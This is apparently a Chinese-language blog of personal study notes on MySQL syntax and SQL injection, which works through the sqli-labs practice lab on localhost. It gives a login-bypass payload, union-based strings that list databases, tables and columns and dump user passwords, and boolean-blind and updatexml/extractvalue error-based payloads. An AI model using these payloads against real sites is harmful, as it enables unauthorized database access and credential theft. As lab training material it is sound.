user () 返回当前数据库连接使用的用户;

database () 返回当前数据库连接使用的数据库;

version () 返回当前数据库的版本;

concat-ws () 函数可以将这些函数进行组合使用并显示出来。concat 函数中,将其中的参数直接连接起来产生新的字符串。而在 concat_ws 函数中,第一个参数是用于作为分隔符将后面各个参数的内容分隔开来再进行相应的连接产生新的字符串。

concat_ws(char(32,58,32),user(),database(),version())

information_schema.tables
table_schema: 记录数据库名;
table_name: 记录数据表名;

group_concat ([DISTINCT] 要连接的字段 [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] )

# sql 的注释

# 使用 #

  • 有时发现执行的 sql 语句中没有 #
  • 原因是 url 中 # 号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。
    所以,HTTP 请求中不包括 #
  • 将 #号改成 url 的编码 %23 就可以了

# 使用 -- 和使用 --+

  • 这里发现+号在语句中变成了空格。
    用来和后面的单引号分隔开,将后面的语句注释。
  • 了解原理后便知道了 -- 无法使用的原因,是因为 -- 与后面的单引号连接在一起,无法形成有效的 mysql 语句。
  • 在 mysql 中使用这个语句分析原因,输入后回车显示分号没有闭合
  • 所以在注入时我们除了使用 --+ 外,也可以使用 --' 来完成 sql 注入语句

http://p2.qhimg.com/t0179a5120e122c8876.png

img

# MySQL 创建数据表

创建 MySQL 数据表需要以下信息:

  • 表名
  • 表字段名
  • 定义每个表字段

# 语法

以下为创建 MySQL 数据表的 SQL 通用语法:

CREATE TABLE table_name (column_name column_type);

以下例子中我们将在 RUNOOB 数据库中创建数据表 runoob_tbl:

CREATE TABLE IF NOT EXISTS `runoob_tbl`(
   `runoob_id` INT UNSIGNED AUTO_INCREMENT,
   `runoob_title` VARCHAR(100) NOT NULL,
   `runoob_author` VARCHAR(40) NOT NULL,
   `submission_date` DATE,
   PRIMARY KEY ( `runoob_id` )
)ENGINE=InnoDB DEFAULT CHARSET=utf8;

实例解析:

  • 如果你不想字段为 NULL 可以设置字段的属性为 NOT NULL, 在操作数据库时如果输入该字段的数据为 NULL ,就会报错。
  • AUTO_INCREMENT 定义列为自增的属性,一般用于主键,数值会自动加 1。
  • PRIMARY KEY 关键字用于定义列为主键。 您可以使用多列来定义主键,列间以逗号分隔。
  • ENGINE 设置存储引擎,CHARSET 设置编码

# MySQL 查询数据

MySQL 数据库使用 SQL SELECT 语句来查询数据。

你可以通过 mysql> 命令提示窗口中在数据库中查询数据,或者通过 PHP 脚本来查询数据。

# select 语法

以下为在 MySQL 数据库中查询数据通用的 SELECT 语法:

SELECT column_name,column_name
FROM table_name
[WHERE Clause]
[LIMIT N][ OFFSET M]
  • 查询语句中你可以使用一个或者多个表,表之间使用逗号 (,) 分割,并使用 WHERE 语句来设定查询条件。
  • SELECT 命令可以读取一条或者多条记录。
  • 你可以使用星号(*)来代替其他字段,SELECT 语句会返回表的所有字段数据
  • 你可以使用 WHERE 语句来包含任何条件。
  • 你可以使用 LIMIT 属性来设定返回的记录数。
  • 你可以通过 OFFSET 指定 SELECT 语句开始查询的数据偏移量。默认情况下偏移量为 0。

select * from runoob_tbl; 例如 * 返回数据表 runoob_tbl 的所有记录

我们知道从 MySQL 表中使用 SQL SELECT 语句来读取数据。

如需有条件地从表中选取数据,可将 WHERE 子句添加到 SELECT 语句中。

以下是 SQL SELECT 语句使用 WHERE 子句从数据表中读取数据的通用语法:

SELECT field1, field2,...fieldN FROM table_name1, table_name2...
[WHERE condition1 [AND [OR]] condition2.....
  • 查询语句中你可以使用一个或者多个表,表之间使用逗号,分割,并使用 WHERE 语句来设定查询条件。
  • 你可以在 WHERE 子句中指定任何条件。
  • 你可以使用 AND 或者 OR 指定一个或多个条件。
  • WHERE 子句也可以运用于 SQL 的 DELETE 或者 UPDATE 命令。
  • WHERE 子句类似于程序语言中的 if 条件,根据 MySQL 表中的字段值来读取指定的数据。

以下为操作符列表,可用于 WHERE 子句中。

MySQL 的 WHERE 子句的字符串比较是不区分大小写的。 你可以使用 BINARY 关键字来设定 WHERE 子句的字符串比较是区分大小写的。

# LIKE 子句

我们知道在 MySQL 中使用 SQL SELECT 命令来读取数据, 同时我们可以在 SELECT 语句中使用 WHERE 子句来获取指定的记录。

WHERE 子句中可以使用等号 = 来设定获取数据的条件,如 "runoob_author = 'RUNOOB.COM'"。

但是有时候我们需要获取 runoob_author 字段含有 "COM" 字符的所有记录,这时我们就需要在 WHERE 子句中使用 SQL LIKE 子句。

SQL LIKE 子句中使用百分号 % 字符来表示任意字符,类似于 UNIX 或正则表达式中的星号 *。

如果没有使用百分号 %, LIKE 子句与等号 = 的效果是一样的。

以下是 SQL SELECT 语句使用 LIKE 子句从数据表中读取数据的通用语法:

SELECT field1, field2,...fieldN 
FROM table_name
WHERE field1 LIKE condition1 [AND [OR]] filed2 = 'somevalue'
  • 你可以在 WHERE 子句中指定任何条件。
  • 你可以在 WHERE 子句中使用 LIKE 子句。
  • 你可以使用 LIKE 子句代替等号 =。
  • LIKE 通常与 % 一同使用,类似于一个元字符的搜索。
  • 你可以使用 AND 或者 OR 指定一个或多个条件。
  • 你可以在 DELETE 或 UPDATE 命令中使用 WHERE...LIKE 子句来指定条件。

# union 子句

UNION 语句:用于将不同表中相同列中查询的数据展示出来;(不包括重复数据)

UNION ALL 语句:用于将不同表中相同列中查询的数据展示出来;(包括重复数据)

使用形式如下:

SELECT 列名称 FROM 表名称 UNION SELECT 列名称 FROM 表名称 ORDER BY 列名称;
SELECT 列名称 FROM 表名称 UNION ALL SELECT 列名称 FROM 表名称 ORDER BY 列名称;

# ORDER BY 子句

以下是 SQL SELECT 语句使用 ORDER BY 子句将查询数据排序后再返回数据:

SELECT field1, field2,...fieldN FROM table_name1, table_name2...
ORDER BY field1 [ASC [DESC][默认 ASC]], [field2...] [ASC [DESC][默认 ASC]]
  • 你可以使用任何字段来作为排序的条件,从而返回排序后的查询结果。
  • 你可以设定多个字段来排序。
  • 你可以使用 ASC 或 DESC 关键字来设置查询结果是按升序或降序排列。 默认情况下,它是按升序排列。
  • 你可以添加 WHERE...LIKE 子句来设置条件。

# 其他 sql 函数

# 一、万能密码

原验证登陆语句:

SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."'

输入 1′ or 1=1 or ‘1’=’1# 万能密码语句变为:

SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG'

逻辑运算的优先顺序是 NOT>OR>AND

因为 1=1 恒为真所以并且注释掉了后面的语句,导致密码无论是啥都可以登录

# 二、数字型注入

可以对传入表达式进行计算 来判断是否为数字型注入

后端语句为

$res=mysqli_query($conn,"select title,content from wp_news where id=".$_GET['id'])

构造 ?id=1 union select user,pwd from wp_user limit 1,1 limit 是指取查询结果第一条记录的后一条记录,或者使用 id=-1

# 爆库名

mysql 的数据库 information_schema,他是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,
用户权限等信息, 常用的几个表

SCHEMATA 表:储存 mysql 所有数据库的基本信息,包括数据库名,编码类型路径等,show databases 的结果取之此表。

TABLES 表:储存 mysql 中的表信息,(当然也有数据库名这一列,这样才能找到哪个数据库有哪些表嘛)包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。show tables from schemaname 的结果取之此表

COLUMNS 表:提供了表中的列信息,(当然也有数据库名和表名称这两列)详细表述了某张表的所有列以及每个列的信息,包括该列是那个表中的第几列,列的数据类型,列的编码类型,列的权限,列的注释等。是 show columns from schemaname.tablename 的结果取之此表。
?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+

# 1. 通过 information_schema 爆表名

select 1 返回 1

id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()

# 2. 爆字段

id=-1 union select 1,group_conact(column_name)from information_schema.columns where table_name='wp_user'

# 3. 爆用户密码

?id=1 union select user,pwd from wp_user limit 1,1

# 三、字符型注入

后端语句 get 输入处若被包裹了单引号或者双引号

判断方法利用 mysql 的强制类型转化例如 id=1a 转化为 id=1 有页面回显则说明为字符型注入

则构造方法为 id=1'--+ 或者 id=1'# 加号在 url 中会被编码为空格

接下来的操作就与数字型操作一样

# 四、无回显的注入

# 布尔盲注(页面的回显有两种情况时)

布尔盲注通过页面的回显来判断 0 或者 1

例如 a 为被猜测的数据 id=1’and 'a'<'n'

用二分法来缩小范围,就能够很快猜出字符

多字符的情况

利用, substring mid substr 函数等 来截取数据的中的一位再用单字符的清况来继续判断

例如?id=1'and mid((select concat(user,0x7e,pwd) from wp_user,1,1))=a 来猜测用户名和密码

# 时间盲注(页面无回显)

# 报错注入

常见的利用函数有: exp()、floor()+rand()、updatexml()、extractvalue()

如: select * from users where username=$username (and | or) updatexml(1,concat(0x7e,(select user()),0x7e),1)

' or updatexml(1,concat('~',database()),1) #

# 实战环节利用安装 sqli-lab 修炼

小白的 sql 注入修炼,参考了各位大佬的博客,感谢

img

version()

@@datadir

system_user()

current_user()

MySQL 隐式转化。

# less-1

1. 找到注入点,发现报错回显。

?id=1'

看到报错语句。

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

用 --+ 或者 %23 注释引号

发现已经闭合,只要在后面加 --+ 或者 #注释掉后面的部分就可以了。
2. 猜字段数。

?id=1'order by 3--+

3. 使用联合查询。

?id=-1'union select 1,2,3--+

查询后面 select 查询的信息
4. 注入查询基本信息

?id=1'union select 1,2,concat_ws(char(32,58,32),user(),database(),version())--+

得到用户名 root@localhost : 数据库 security : 版本信息 5.5.44-0ubuntu0.14.04.1

这里可以看到是在 security 数据库里面了,但是我们也可以构造一条语句爆出所有的库。
5. 爆库

首先说一下 mysql 的数据库 information_schema,他是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,
用户权限等信息,下面说一下常用的几个表

SCHEMATA 表:储存 mysql 所有数据库的基本信息,包括数据库名,编码类型路径等,show databases 的结果取之此表。

TABLES 表:储存 mysql 中的表信息,(当然也有数据库名这一列,这样才能找到哪个数据库有哪些表嘛)包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。show tables from schemaname 的结果取之此表

COLUMNS 表:提供了表中的列信息,(当然也有数据库名和表名称这两列)详细表述了某张表的所有列以及每个列的信息,包括该列是那个表中的第几列,列的数据类型,列的编码类型,列的权限,猎德注释等。是 show columns from schemaname.tablename 的结果取之此表。

?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+

得到数据库

information_schema,challenges,mysql,performance_schema,security

6. 爆库 security 的表

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

ps:table_schema = 后面可以直接加单引号括起的数据库名,也可以是数据库的 16 进制,过滤单引号可用。

得到 security 数据库的所有表

emails,referers,uagents,users

7. 爆 users 列

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

id,username,password

8. 爆数据

?id=-1'union select 1,username,password from users where id=2--+

确定注入点以后首先利用 order by 来确定列数

?id=1'order by 3--+

爆库名 (其实另 一种写法不用)

?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+

image-20210515224620520

爆表名

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

爆列名

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

爆记录

?id=-1'union select 1,username,password from users where id=2--+

# 其他做法

?id=1'order by 3--+

确定该数据库的列数后

?id=-1' union select 1,2,3%23

这种就是先看第几个数是有回显的

发现第 2,3 个数有回显

然后进行注入

user(),database(),version()

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 %23

这里 database 是指当前使用的数据库

接着

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3%23
得到 users 表下的所有列名

?id=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)%23

# less-2

image-20210524164415822

image-20210524165823637

image-20210524170023820

image-20210524170330219

image-20210524170655132

# less-3

http://localhost/sqli-labs/Less-3/?id=1')--+

# less-4

无回显报错注入

1.mid () 函数

MID(column_name,start[,length])

如: str="123456" mid (str,2,1) 结果为 2

Sql 用例:

(1)MID(DATABASE(),1,1)>’a’,查看数据库名第一位,MID(DATABASE(),2,1)查看数据库名第二位,依次查看各位字符。

(2)MID((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=0xxxxxxx LIMIT 0,1),1,1)>’a’此处column_name参数可以为sql语句,可自行构造sql语句进行注入。

2.substr () 函数

Substr () 和 substring () 函数实现的功能是一样的,均为截取字符串。

string substring(string, start, length)

string substr(string, start, length)

参数描述同 mid () 函数,第一个参数为要处理的字符串,start 为开始位置,length 为截取的长度。

Sql 用例:

(1) substr(DATABASE(),1,1)>’a’,查看数据库名第一位,substr(DATABASE(),2,1)查看数据库名第二位,依次查看各位字符。

(2) substr((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=0xxxxxxx LIMIT 0,1),1,1)>’a’此处string参数可以为sql语句,可自行构造sql语句进行注入。

3.Left () 函数

Left () 得到字符串左部指定个数的字符

Left (string, n) string 为要截取的字符串,n 为长度。

Sql 用例:

(1) left(database(),1)>’a’,查看数据库名第一位,left(database(),2)>’ab’,查看数据库名前二位。

(2) 同样的string可以为自行构造的sql语句。

参考 :https://blog.csdn.net/like98k/article/details/79436463

image-20210524201735946

盲注脚本法

报错注入法

(1). 通过 floor 报错
and (select 1 from (select count (*),concat ((payload),floor (rand (0)*2)) x from information_schema.tables group by x) a)
其中 payload 为你要插入的 SQL 语句
需要注意的是该语句将 输出字符长度限制为 64 个字符

(2). 通过 updatexml 报错
and updatexml (1,payload,1)
同样该语句对输出的字符长度也做了限制,其最长输出 32 位
并且该语句对 payload 的反悔类型也做了限制,只有在 payload 返回的不是 xml 格式才会生效

(3). 通过 ExtractValue 报错
and extractvalue (1, payload)
输出字符有长度限制,最长 32 位。

http://localhost/sqli-labs/Less-5/?id=1'and left(version(),1)=5--+

得到版本号为 5 开头

?id=1'and length(database())=8--+

数据库长度为 8

一、concat()函数

1、mysql 的 Concat 函数可以连接一个或多个字符串

select concat('10');//10

select concat('11','22','33');//112233

但是 Oracle 的 concat 函数只能连接两个字符串,不能多也不能少

select concat('11','22') from dual;

2、mysql 的 Concat 函数再连接字符串的时候,只要其中一个是 null,南无返回就是 null

select concat('11','22',null);//null

而 Oracle 的 concat 函数连接的时候,只要有一个字符串不是 NULL, 就不会返回 NULL

select concat('11',NULL) from dual;//11

二、concat.ws () 函数

表示 concat with separator, 即有分隔符的字符串连接

select concat_ws(',','11','22','33');//11,22,33

select concat_ws('|','11','22','33');//11|22|33

select concat_ws('','11','22',NULL);//1122

和 concat 不同的是,concat_ws 函数在执行的时候,不会因为 NULL 值而返回 NULL

三、group_concat ()

***** 必须将 group by 按照什么东西排序,也打印出来;否则函数不起作用

可用来行转列

爆基本信息

?id=1' and updatexml(1,concat(0x7e,(select concat_ws(':',database(),version(),user())),0x7e),1)--+

相当于报错注入的模板为

?id=1' and updatexml(1,concat(0x7e,(sql语句),0x7e),1)--+

?id=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),0x7e,1)--+

查询当前库的所有表:

http://127.0.0.1/sql-labs/less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where
table_schema=database())),1)--+

查询 users 表中的所有字段:
http://127.0.0.1/sql-labs/less-5/?id=1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where
table_name=‘users’),0x7e),1)–+

查询 username、password 字段的内容:

http://127.0.0.1/sql-labs/less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,':',passwo

超过长度限制利用 mid 等函数截取

更新于 阅读次数